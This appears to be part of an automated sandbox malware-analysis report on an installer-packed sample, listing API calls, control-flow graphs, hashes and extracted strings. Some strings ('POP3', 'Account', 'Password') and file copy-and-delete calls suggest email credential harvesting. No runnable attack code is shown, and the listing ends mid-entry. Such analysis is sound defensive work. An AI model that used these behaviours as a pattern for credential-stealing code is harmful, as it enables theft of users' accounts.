                                                                                                    • Opcode ID: e933dc0526c884264ccc966e1026b46eff21a82c7d1415d0660c4e1366fcbd20
                                                                                                    • Instruction ID: fe5ebf8e7a3d3daaf9cbba1b4cb9a1e73201f421c795aceacce4267b8607b26b
                                                                                                    • Opcode Fuzzy Hash: e933dc0526c884264ccc966e1026b46eff21a82c7d1415d0660c4e1366fcbd20
                                                                                                    • Instruction Fuzzy Hash: EB61A370644200BED720AF669C46F2B3A6CEB84749F40453FF945B62E2D7786902CA3E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 609 404337-404349 610 404469-404476 609->610 611 40434f-404357 609->611 612 4044d3-4044d7 610->612 613 404478-404481 610->613 614 404359-404368 611->614 615 40436a-40438e 611->615 620 4045a5-4045ac 612->620 621 4044dd-4044f5 GetDlgItem 612->621 616 4045b4 613->616 617 404487-40448d 613->617 614->615 618 404390 615->618 619 404397-404412 call 40419a * 2 CheckDlgButton call 4041bc GetDlgItem call 4041cf SendMessageW 615->619 625 4045b7-4045be call 404201 616->625 617->616 622 404493-40449e 617->622 618->619 649 404414-404417 GetSysColor 619->649 650 40441d-404464 SendMessageW * 2 lstrlenW SendMessageW * 2 619->650 620->616 623 4045ae 620->623 626 404566-40456d 621->626 627 4044f7-4044fe 621->627 622->616 629 4044a4-4044ce GetDlgItem SendMessageW call 4041bc call 4045ca 622->629 623->616 637 4045c3-4045c7 625->637 626->625 628 40456f-404576 626->628 627->626 632 404500-40451b 627->632 628->625 634 404578-40457c 628->634 629->612 632->626 633 40451d-404563 SendMessageW LoadCursorW SetCursor ShellExecuteW LoadCursorW SetCursor 632->633 633->626 638 40458e-404592 634->638 639 40457e-40458c SendMessageW 634->639 642 4045a0-4045a3 638->642 643 404594-40459e SendMessageW 638->643 639->638 642->637 643->642 649->650 650->637
                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(?,-0000040A,?), ref: 004043D5
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                                                                    • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404406
                                                                                                    • GetSysColor.USER32(?), ref: 00404417
                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404438
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                                                                    • SendMessageW.USER32(00000000), ref: 004044BA
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                                                                    • SetCursor.USER32(00000000), ref: 00404539
                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 0040454E
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                                                                    • SetCursor.USER32(00000000), ref: 0040455D
                                                                                                    • SendMessageW.USER32(00000111,?,00000000), ref: 0040458C
                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                    • String ID: N$open
                                                                                                    • API String ID: 3615053054-904208323
                                                                                                    • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                    • Instruction ID: ef3aff8114c15a744cba6b044a82d146c21238a9e490568bd42f4e53aa973cae
                                                                                                    • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                    • Instruction Fuzzy Hash: CF718FB1A00209FFDB109F60DD85A6A7BA9FB94344F00853AFB01B62D1C778AD51CF99

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 651 3356173a-335617fe call 3356c030 call 33562c40 * 2 658 33561803 call 33561cca 651->658 659 33561808-3356180c 658->659 660 33561812-33561816 659->660 661 335619ad-335619b1 659->661 660->661 662 3356181c-33561837 call 33561ede 660->662 665 3356199f-335619ac call 33561ee7 * 2 662->665 666 3356183d-33561845 662->666 665->661 667 33561982-33561985 666->667 668 3356184b-3356184e 666->668 670 33561987 667->670 671 33561995-33561999 667->671 668->667 672 33561854-33561881 call 335644b0 * 2 call 33561db7 668->672 674 3356198a-3356198d call 33562c40 670->674 671->665 671->666 685 33561887-3356189f call 335644b0 call 33561db7 672->685 686 3356193d-33561943 672->686 680 33561992 674->680 680->671 685->686 700 335618a5-335618a8 685->700 688 33561945-33561947 686->688 689 3356197e-33561980 686->689 688->689 691 33561949-3356194b 688->691 689->674 693 33561961-3356197c call 335616aa 691->693 694 3356194d-3356194f 691->694 693->680 697 33561955-33561957 694->697 698 33561951-33561953 694->698 701 3356195d-3356195f 697->701 702 33561959-3356195b 697->702 698->693 698->697 703 335618c4-335618dc call 335644b0 call 33561db7 700->703 704 335618aa-335618c2 call 335644b0 call 33561db7 700->704 701->689 701->693 702->693 702->701 703->671 713 335618e2-3356193b call 335616aa call 335615da call 33562c40 * 2 703->713 704->703 704->713 713->671
                                                                                                    APIs
                                                                                                      • Part of subcall function 33561CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 33561D1B
                                                                                                      • Part of subcall function 33561CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 33561D37
                                                                                                      • Part of subcall function 33561CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33561D4B
                                                                                                    • _strlen.LIBCMT ref: 33561855
                                                                                                    • _strlen.LIBCMT ref: 33561869
                                                                                                    • _strlen.LIBCMT ref: 3356188B
                                                                                                    • _strlen.LIBCMT ref: 335618AE
                                                                                                    • _strlen.LIBCMT ref: 335618C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                    • API String ID: 3296212668-3023110444
                                                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                    • Instruction ID: e80528d41e57e3f07679de67d3a8bb89153f79c46aad874ab828c7689084e529
                                                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                    • Instruction Fuzzy Hash: DC6156B5D00318AFEF11CBA4E840BEEB7B9AF85308F846456D185A7250DF745B85CF52

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen
                                                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                    • API String ID: 4218353326-230879103
                                                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                    • Instruction ID: 5a722c4f280d001a5e979aed7e38817e36ad8ff87df6c63d02675ca3890da348
                                                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                    • Instruction Fuzzy Hash: 91715AB1D003686BDF119BB4AC84AEF7BFC9F49349F54509AD944D3241EA38D785CBA0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 791 405caa-405cd1 lstrcpyW 792 405cd3-405ceb call 405bf8 CloseHandle GetShortPathNameW 791->792 793 405cf9-405d08 GetShortPathNameW 791->793 795 405e20-405e25 792->795 800 405cf1-405cf3 792->800 793->795 796 405d0e-405d10 793->796 796->795 797 405d16-405d54 wsprintfA call 405fae call 405bf8 796->797 797->795 804 405d5a-405d76 GetFileSize GlobalAlloc 797->804 800->793 800->795 805 405e19-405e1a CloseHandle 804->805 806 405d7c-405d86 call 405c7b 804->806 805->795 806->805 809 405d8c-405d99 call 405b5d 806->809 812 405d9b-405dad lstrcpyA 809->812 813 405daf-405dc1 call 405b5d 809->813 814 405de4 812->814 818 405de0 813->818 819 405dc3-405dc9 813->819 816 405de6-405e13 call 405bb3 SetFilePointer WriteFile GlobalFree 814->816 816->805 818->814 821 405dd1-405dd3 819->821 823 405dd5-405dde 821->823 824 405dcb-405dd0 821->824 823->816 824->821
                                                                                                    APIs
                                                                                                    • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E4E,?,?,?,004059C6,?,00000000,000000F1,?), ref: 00405CBA
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405E4E,?,?,?,004059C6,?,00000000,000000F1,?), ref: 00405CDE
                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CE7
                                                                                                      • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                      • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                    • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405D04
                                                                                                    • wsprintfA.USER32 ref: 00405D22
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D5D
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D6C
                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405DA4
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DFA
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405E0C
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405E13
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405E1A
                                                                                                      • Part of subcall function 00405BF8: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BFC
                                                                                                      • Part of subcall function 00405BF8: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                                                                    • API String ID: 1265525490-899692902
                                                                                                    • Opcode ID: 4ec48ef19e877a87b4e550a8e1bcde9517342a2eb5b98d96a27769bbdfe06ad2
                                                                                                    • Instruction ID: 278018eb507e55e18bba05fe136388c5c8d345875c3a2ef582da275f9efe5ed0
                                                                                                    • Opcode Fuzzy Hash: 4ec48ef19e877a87b4e550a8e1bcde9517342a2eb5b98d96a27769bbdfe06ad2
                                                                                                    • Instruction Fuzzy Hash: 4C410F71604B19BFD2206B61AC4DF6B3A6CDF45754F14053BB901F62C2EA38A9018ABD
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                    • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: F
                                                                                                    • API String ID: 941294808-1304234792
                                                                                                    • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                    • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                                                                    • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                    • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                                                                    • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                                                                    • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                                                      • Part of subcall function 0040574C: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040575F
                                                                                                      • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406283
                                                                                                      • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                      • Part of subcall function 00406220: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406297
                                                                                                      • Part of subcall function 00406220: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 004062AA
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487C
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404897
                                                                                                      • Part of subcall function 004049F0: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                      • Part of subcall function 004049F0: wsprintfW.USER32 ref: 00404A9A
                                                                                                      • Part of subcall function 004049F0: SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: A$&B
                                                                                                    • API String ID: 2624150263-2586977930
                                                                                                    • Opcode ID: 6280fc6980825afd9ee0809b1ca6071d0e9f114e0af1474ec63fd39ca55c6531
                                                                                                    • Instruction ID: 99b17f69f627c4fe70adaab035ba94d9a502da106e2b73a6a76b2d9e8e29038f
                                                                                                    • Opcode Fuzzy Hash: 6280fc6980825afd9ee0809b1ca6071d0e9f114e0af1474ec63fd39ca55c6531
                                                                                                    • Instruction Fuzzy Hash: ECA170B1A00209ABDB11AFA5DC85AAF77B8EF85714F10843BF601B62D1D77C89418F69
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 33567D06
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 335690D7
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 335690E9
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 335690FB
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 3356910D
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 3356911F
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 33569131
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 33569143
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 33569155
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 33569167
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 33569179
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 3356918B
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 3356919D
                                                                                                      • Part of subcall function 335690BA: _free.LIBCMT ref: 335691AF
                                                                                                    • _free.LIBCMT ref: 33567CFB
                                                                                                      • Part of subcall function 3356571E: HeapFree.KERNEL32(00000000,00000000,?,3356924F,?,00000000,?,00000000,?,33569276,?,00000007,?,?,33567E5A,?), ref: 33565734
                                                                                                      • Part of subcall function 3356571E: GetLastError.KERNEL32(?,?,3356924F,?,00000000,?,00000000,?,33569276,?,00000007,?,?,33567E5A,?,?), ref: 33565746
                                                                                                    • _free.LIBCMT ref: 33567D1D
                                                                                                    • _free.LIBCMT ref: 33567D32
                                                                                                    • _free.LIBCMT ref: 33567D3D
                                                                                                    • _free.LIBCMT ref: 33567D5F
                                                                                                    • _free.LIBCMT ref: 33567D72
                                                                                                    • _free.LIBCMT ref: 33567D80
                                                                                                    • _free.LIBCMT ref: 33567D8B
                                                                                                    • _free.LIBCMT ref: 33567DC3
                                                                                                    • _free.LIBCMT ref: 33567DCA
                                                                                                    • _free.LIBCMT ref: 33567DE7
                                                                                                    • _free.LIBCMT ref: 33567DFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: b6ee7b4e854687781b1c3e95b04933d524b4065eb4a570e0a09990a361abed3b
                                                                                                    • Instruction ID: ebb7d9bb83f2e2f3c31404fda84dd8c358f7e3ddd4f353a448bc4724859eb999
                                                                                                    • Opcode Fuzzy Hash: b6ee7b4e854687781b1c3e95b04933d524b4065eb4a570e0a09990a361abed3b
                                                                                                    • Instruction Fuzzy Hash: C9316F75A00309DFEB219E38F840B6677F9EF40398FA96C59E859D7951DE31A880CB10
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                      • Part of subcall function 00405BF8: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BFC
                                                                                                      • Part of subcall function 00405BF8: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 00402E0C
                                                                                                    • soft, xrefs: 00402EAC
                                                                                                    • Inst, xrefs: 00402EA3
                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                    • Null, xrefs: 00402EB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                    • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                    • API String ID: 2803837635-787788815
                                                                                                    • Opcode ID: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                                                                    • Instruction ID: 4e3209b53bdebe8ba6f789b0e0a530dabd6f5a0a3926ba0fa2d0dbc3b843d87d
                                                                                                    • Opcode Fuzzy Hash: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                                                                    • Instruction Fuzzy Hash: 4D610631941205ABDB209FA4DD85B9E3BB8EB04354F20457BF604B72D2C7BC9E419BAD
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,004216C8,?,0040526B,004216C8,00000000,00000000,00000000), ref: 00406071
                                                                                                    • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060EF
                                                                                                    • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 00406102
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040613E
                                                                                                    • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 0040614C
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00406157
                                                                                                    • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617B
                                                                                                    • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,0040526B,004216C8,00000000,00000000,00000000), ref: 004061D5
                                                                                                    Strings
                                                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406175
                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                    • API String ID: 900638850-730719616
                                                                                                    • Opcode ID: e31b2ddd4529637651ef3c93dcef70bddb782fc6bb0b3b2f1a5ed02a94110898
                                                                                                    • Instruction ID: 5cce0682863fafc60a16059ed1eb0c3d77be7ea2b31a2434558a531189329514
                                                                                                    • Opcode Fuzzy Hash: e31b2ddd4529637651ef3c93dcef70bddb782fc6bb0b3b2f1a5ed02a94110898
                                                                                                    • Instruction Fuzzy Hash: EA61D271A00115AADF209F25CC40AAF37A5EF54314F12813FE906BA2D1D73D99A2CB5E
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 335659EA
                                                                                                      • Part of subcall function 3356571E: HeapFree.KERNEL32(00000000,00000000,?,3356924F,?,00000000,?,00000000,?,33569276,?,00000007,?,?,33567E5A,?), ref: 33565734
                                                                                                      • Part of subcall function 3356571E: GetLastError.KERNEL32(?,?,3356924F,?,00000000,?,00000000,?,33569276,?,00000007,?,?,33567E5A,?,?), ref: 33565746
                                                                                                    • _free.LIBCMT ref: 335659F6
                                                                                                    • _free.LIBCMT ref: 33565A01
                                                                                                    • _free.LIBCMT ref: 33565A0C
                                                                                                    • _free.LIBCMT ref: 33565A17
                                                                                                    • _free.LIBCMT ref: 33565A22
                                                                                                    • _free.LIBCMT ref: 33565A2D
                                                                                                    • _free.LIBCMT ref: 33565A38
                                                                                                    • _free.LIBCMT ref: 33565A43
                                                                                                    • _free.LIBCMT ref: 33565A51
                                                                                                    Memory Dump Source
